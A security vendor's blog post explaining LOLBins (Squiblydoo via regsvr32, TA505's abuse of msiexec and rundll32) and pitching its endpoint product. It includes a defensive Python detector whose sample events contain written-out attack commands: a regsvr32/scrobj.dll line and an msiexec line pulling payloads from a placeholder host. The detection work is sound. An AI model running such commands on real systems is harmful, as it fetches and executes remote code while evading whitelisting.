The next few days Seqrite will publish descriptive blogs about the forecasts from its ‘Seqrite Predictions 2020: Cyberthreats’ with the aim of educating readers about what individual threats mean. We begin with the prediction titled, ‘Increased use of LOLBins’ in the report.
Despite how the name sounds, there is nothing humorous about LOLBins. Unlike the common parlance of ‘LOL’, in this case LOL refers to ‘Living off the Land’, and LOLBins refer to a particular type of attack technique that is creating a lot of chaos among enterprises.
The full form of LOLBin is ‘Living Off the Land Binaries’ and they refer to Windows binaries that are non-malicious in nature but are used by attackers to hide malicious activity. This is an extremely crafty way to conduct an attack without leaving any traces as the malicious activity is hidden by regular binaries. As attackers are using legitimate and benign binaries located within the operating system to hide their malicious activity, they are effectively evading cyber defences.
Exploiting legitimate files for malware
That is how LOLBins justify their name of ‘living off the land’ — using this technique, attackers do not need to inject malicious files or software in Operating Systems. Instead, they can exploit legitimate Microsoft files to conduct malicious activities like DLL hijacking, hiding payloads, process downloading, executing code and stealing passwords.
Two examples illustrate how LOLBins are used. A particular type of attack, nicknamed the Squiblydoo attack, utilizes a common Windows utility called Regsvr32.exe which is present in every Windows system and is used by power users to edit the Registry.
Using Regsvr32, malicious elements can bypass a system’s existing Application Whitelisting processes and execute malicious code that would otherwise be blocked. Hence, the system’s existing security defences are bypassed and cybercriminals can escalate their hold over a system.
LOLBins were also used in a targeted phishing campaign in 2018. The TA505 group ran a spear-phishing campaign against financial institutions using a backdoor. They used LOLBins and took advantage of legitimate Windows binaries like msiexec.exe, rundll32.exe and net.exe to deliver their malware payload, stealthily evading detection.
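Because the binaries named above are legitimate and signed, blocking them outright is rarely an option; detection instead has to look at how they are invoked. The following is an added example, not Seqrite's code and not taken from the report: it scans process-creation records for regsvr32.exe, msiexec.exe, rundll32.exe and net.exe and flags command lines that pull content from a remote URL, the publicly documented Squiblydoo pattern (regsvr32 loading scrobj.dll), and LOLBins spawned directly by an Office application, which is the usual shape of a spear-phishing delivery. The pipe-delimited log format, the Office-parent heuristic and every path, PID and URL in the sample events are constructed for the example and are not real telemetry.

```python
"""Flag suspicious LOLBin invocations in process-creation records.

Added example (not Seqrite's code). Input lines use a constructed
pipe-delimited format:  pid|image path|parent image path|command line
"""
import re
from dataclasses import dataclass
from typing import List

# Binaries named in the post (Squiblydoo and the 2018 TA505 campaign)
LOLBINS = {"regsvr32.exe", "msiexec.exe", "rundll32.exe", "net.exe"}
# Assumed heuristic: an Office process is an unusual parent for these binaries
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


@dataclass
class Finding:
    pid: int
    image: str
    reason: str


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse(line: str) -> List[Finding]:
    """Apply the three detection rules to one process-creation record."""
    pid, image, parent, cmd = line.split("|", 3)
    exe = basename(image)
    findings: List[Finding] = []
    if exe not in LOLBINS:
        return findings
    # Rule 1: a LOLBin fetching something from the network is worth a look
    if URL_RE.search(cmd):
        findings.append(Finding(int(pid), exe, "remote URL in command line"))
    # Rule 2: regsvr32 + scrobj.dll is the documented Squiblydoo pattern
    if exe == "regsvr32.exe" and "scrobj.dll" in cmd.lower():
        findings.append(Finding(int(pid), exe, "regsvr32 loading scrobj.dll (Squiblydoo pattern)"))
    # Rule 3 (assumed heuristic): phishing documents spawn LOLBins from Office
    if basename(parent) in OFFICE_PARENTS:
        findings.append(Finding(int(pid), exe, f"spawned by {basename(parent)}"))
    return findings


def scan(lines) -> List[Finding]:
    """Run analyse() over every record and collect the findings."""
    out: List[Finding] = []
    for line in lines:
        out.extend(analyse(line))
    return out


# Constructed sample events (paths, PIDs and URLs are placeholders)
SAMPLE_EVENTS = [
    r"4120|C:\Windows\System32\regsvr32.exe|C:\Program Files\Microsoft Office\WINWORD.EXE|"
    r"regsvr32 /s /n /u /i:http://example.invalid/payload.sct scrobj.dll",
    r"5000|C:\Windows\System32\regsvr32.exe|C:\Windows\System32\msiexec.exe|"
    r"regsvr32 /s C:\Program Files\Vendor\vendor.dll",
    r"5010|C:\Windows\System32\msiexec.exe|C:\Windows\explorer.exe|"
    r"msiexec /q /i http://example.invalid/update.msi",
    r"5020|C:\Windows\System32\net.exe|C:\Windows\System32\cmd.exe|net user",
    r"5030|C:\Windows\System32\rundll32.exe|C:\Windows\System32\svchost.exe|"
    r"rundll32.exe shell32.dll,Control_RunDLL",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"pid={f.pid} image={f.image}: {f.reason}")
```

Run as a script, it reports the regsvr32 event three times (remote URL, scrobj.dll, Office parent) and the msiexec event once, while the local DLL registration, `net user` and the rundll32 control-panel call produce nothing. The point of keeping the rules narrow is that all four binaries run constantly on healthy systems; the signal is in the arguments and the parent, not in the binary itself.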
Used in conjunction with fileless malware
For enterprises dealing with the twofold threat posed by fileless malware and LOLBins, it is imperative to deploy an advanced enterprise security solution that can neutralize such threats. Seqrite’s Endpoint Security Enterprise Suite recently received a BEST+++ Certificate from AVLab, an independent organization that conducts tests on security software for corporate networks and individual user devices, on the Fileless Malware Protection Test.
Other ways in which enterprises can prevent such threats include:
- Maintaining operating system software and enterprise applications by keeping them updated. In this regard, enterprises using Windows 7 should seriously consider upgrading to Windows 10, as Microsoft no longer offers support for Windows 7.
- Ensuring that advertisement-heavy, resource-intensive websites are not used within the enterprise
- Ensuring that software on enterprise systems is only installed from legitimate sources
- Maintaining regular and timely backups of enterprise data